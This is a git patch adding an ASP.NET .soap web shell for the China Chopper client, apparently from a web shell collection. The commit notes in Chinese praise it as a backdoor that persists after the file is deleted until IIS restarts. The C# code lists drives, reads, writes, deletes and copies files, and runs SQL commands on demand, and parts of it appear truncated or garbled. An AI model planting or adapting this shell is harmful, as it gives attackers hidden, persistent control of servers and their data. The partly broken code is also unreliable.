From aa4698855755fab752e73a0b25af4f858ba23c59 Mon Sep 17 00:00:00 2001 From: tennc Date: Tue, 5 Apr 2016 12:42:19 +0800 Subject: [PATCH] Create Customize.soap MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit from : zone.wooyun.org author : RedFree 1、.soap文件只有放在web根目录时才能顺利调用,放到子目录中会报错! 这个错误我并未解决,且待更深入的学习吧。。。 2、.soap调用一次后,即便把这个文件删除,方法依然存在且可调用,除非重启IIS!(很好的后门咩) 3、针对不同的.NET版本,以上代码有可能报错,可自行修改。 4、因无法搞定GET/POST传参的异常,如果要使用菜刀去连接,你需要写一个简单的中转脚本。 --- caidao-shell/Customize.soap | 316 ++++++++++++++++++++++++++++++++++++ 1 file changed, 316 insertions(+) create mode 100644 caidao-shell/Customize.soap diff --git a/caidao-shell/Customize.soap b/caidao-shell/Customize.soap new file mode 100644 index 0000000..fe6e773 --- /dev/null +++ b/caidao-shell/Customize.soap @@ -0,0 +1,316 @@ +<%@ WebService Language="C#" Class="Control" %> +using System; +using System.Web; +using System.IO; +using System.Net; +using System.Text; +using System.Data; +using System.Data.SqlClient; +using System.Collections.Generic; +using System.Diagnostics; +using System.Web.SessionState; +using System.Web.Services; +using System.Xml; +using System.Web.Services.Protocols; + +[WebService(Namespace = "http://www.wooyun.org/whitehats/RedFree")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] + +[Serializable] +public class Control : MarshalByRefObject +{ + public Control() + { + + } + [WebMethod(Description="Customize Script")] + public string Chopper(String z, String z1, String z2, String z3) { + String Z = z; + String result = ""; + if (Z != "") + { + String Z1 = z1; + String Z2 = z2; + String Z3 = z3; + String R = ""; + try + { + switch (Z) + { + case "A": + { + String[] c = Directory.GetLogicalDrives(); + R = String.Format("{0}\t", HttpContext.Current.Server.MapPath("/")); + for (int i = 0; i < c.Length; i++) + R += c[i][0] + ":"; + break; + } + case "B": + { + DirectoryInfo m = new DirectoryInfo(Z1); + foreach (DirectoryInfo D in m.GetDirectories()) + { + R += String.Format("{0}/\t{1}\t0\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss")); + } + foreach (FileInfo D in m.GetFiles()) + { + R += String.Format("{0}\t{1}\t{2}\t-\n", D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString("yyyy-MM-dd hh:mm:ss"), D.Length); + } + break; + } + case "C": + { + StreamReader m = new StreamReader(Z1, Encoding.Default); + R = m.ReadToEnd(); + m.Close(); + break; + } + case "D": + { + StreamWriter m = new StreamWriter(Z1, false, Encoding.Default); + m.Write(Z2); + R = "1"; + m.Close(); + break; + } + case "E": + { + if (Directory.Exists(Z1)) + { + Directory.Delete(Z1, true); + } + else + { + File.Delete(Z1); + } + R = "1"; + break; + } + case "F": + { + result += "\x2D\x3E\x7C"; + HttpContext.Current.Response.WriteFile(Z1); + result += "\x7C\x3C\x2D"; + return result; + } + case "G": + { + byte[] B=new byte[Z2.Length/2]; + for (int i=0;i 0) + { + DataRowCollection rows = ds.Tables[0].Rows; + for (c = 0; c < ds.Tables[0].Columns.Count; c++) + { + R += String.Format("{0}\t|\t", ds.Tables[0].Columns[c].ColumnName.ToString()); + } + R += "\r\n"; + for (i = 0; i < rows.Count; i++) + { + for (c = 0; c < ds.Tables[0].Columns.Count; c++) + { + R += String.Format("{0}\t|\t", rows[i][c].ToString()); + } + R += "\r\n"; + } + } + ds.Clear(); + ds.Dispose(); + } + else + { + SqlCommand cm = Conn.CreateCommand(); + cm.CommandText = Z2; + cm.ExecuteNonQuery(); + R = "Result\t|\t\r\nExecute Successfully!\t|\t\r\n"; + } + Conn.Close(); + break; + } + default: goto End; + } + } + catch (Exception E) + { + R = "ERROR:// " + E.Message; + } + result += "\x2D\x3E\x7C" + R + "\x7C\x3C\x2D"; + End: ; + } + return result; + } + public void CP(String S, String D) + { + if (Directory.Exists(S)) + { + DirectoryInfo m = new DirectoryInfo(S); + Directory.CreateDirectory(D); + foreach (FileInfo F in m.GetFiles()) + { + File.Copy(S + "\\" + F.Name, D + "\\" + F.Name); + } + foreach (DirectoryInfo F in m.GetDirectories()) + { + CP(S + "\\" + F.Name, D + "\\" + F.Name); + } + } + else + { + File.Copy(S, D); + } + } +}